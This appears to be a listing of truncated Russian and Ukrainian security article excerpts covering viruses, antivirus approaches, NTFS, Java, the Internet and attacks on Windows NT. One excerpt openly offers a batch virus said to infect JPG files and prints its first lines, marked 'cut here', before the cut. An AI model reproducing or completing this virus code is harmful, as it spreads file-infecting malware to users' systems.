Для защиты от вирусов можно использовать: — общие средства защиты информации, которые полезны также и как страховка от физической порчи магнитных дисков, неправильно работающих программ или ошибочных действий пользователей; — профилактические меры, позволяющие уменьшить вероятность заражения вирусом; — специализированные программы для защиты от вирусов. Общие средства защиты информации полезны не только для защиты от вируса […]


Программы — мониторы в войне против вирусов. Мы столкнулись вплотную с вирусами в конце 1989г. Сразу возник вопрос: как обеспечить эффективную защиту программ? Анализ возможных способов противодействия вирусам привел нас к неожиданному выводу: писать новую программу, удаляющую известные вирусы, нецелесообразно. Во-первых, новые вирусы появляются намного быстрее, чем антивирусные программы, причем для лечения зараженного файла необходимо […]


Технология Java прочно завоевывает современный компьютерный мир. Ее широкие возможности по созданию распределенных вычислений не могут оставить равнодушными ни одного разработчика программного обеспечения. Однако часто бывает так, что серьезные возможности порождают не менее серьезные проблемы, связанные с обеспечением безопасности. Создатели Java предусмотрели определенные методы защиты данных при распределенных вычислениях, но сейчас еще трудно понять, насколько […]


КЛАССИФИКАЦИЯ КОМПЬЮТЕРНЫХ ВИРУСОВ. Серьезность и долговременный характер проблемы защиты от компьютерных вирусов уже практически не у кого не вызывают сомнений. Поэтому необходимо организовать оперативный обмен информацией по данной проблеме и наладить взаимодействие работающих в этой области специалистов. Это, в свою очередь, требует решения ряда подзадач, одной из которых является выработка стандартной классификации компьютерных вирусов. Стандартная […]


NTFS обеспечивает комбинацию эффективности, надежности и совместимости, отсутствующую в FAT или HPFS. Она разработана для быстрого выполнения стандартных файловых операций типа чтения, записи и поиска, а также улучшенных операций типа восстановления файловой системы на очень больших жестких дисках. NTFS также включает возможности безопасности, требуемые для файловых серверов и высококачественных персональных компьютеров в корпоративной среде. NTFS […]


Интернет как это описано во введении, это сеть сетей, обеспечивающая инфраструктуру для взаимодействия и совместного использования информации. Он обеспечивает ряд сервисов, такие как электронная почта, передача файлов, подключение в режиме удаленного терминала, интерактивные конференции, группы новостей, и WWW. World Wide Web (называется «WWW’, «Web» или «W3») — это вселенная информации, доступной из Интернета. WWW появился […]


Чи всі інформаційні системи потребують захисту? Відповідь на першу частину цього питання — так, але ось від чого їх потрібно захищати, залежить від характеру системи. Наприклад, персональний комп’ютер потребує захисту від проникнення вірусів, а для вибору надійної системи захисту автоматизованої системи обробки інформації, наприклад, кредитно-банківської системи треба визначити можливі канали просочення інформації та несанкціонованого доступу […]


Вам известно, что JPG-файлы — это картинки. И вы наверно слышали, что заражать их нельзя. Но на самом деле заражать можно почти все. Вот смотрите. Вирус заражает *.JPG в текущем каталоге.  ———————— резать тут —————————— @echo off%[MrWeb]% if ‘%1==’In_ goto MrWebin if exist c:MrWeb.bat goto MrWebru if not exist %0 goto MrWeben find «MrWeb»<%0>c:MrWeb.bat attrib […]


Как указывалось ранее, в сети Интернет все большее распространение получают атаки на доступность данных. Возможность их успешного проведения вытекает из уязвимости базовых протоколов информационного обмена в сети Интернет. Кроме этого, имеются типичные слабости реализации протоколов TCP/IP, наследуемые современными операционными системами. Рассмотрим атаки на доступность базовых функций Windows NT, получившие распространение в 1997-1998 rr. и вызвавшие […]


Торговые организации и банки довольно успешно пользуются Web-транзакциями в коммерческих целях; правительственные ведомства США также всерьез заинтересовались этой технологией. Однако как обстоят дела с информационной безопасностью? Достаточно ли совершенны, удобны и доступны по цене современные технологии управления доступом, шифрования данных и сертификации? Специалисты утверждают, что в настоящее время имеются все необходимые продукты для выполнения безопасных […]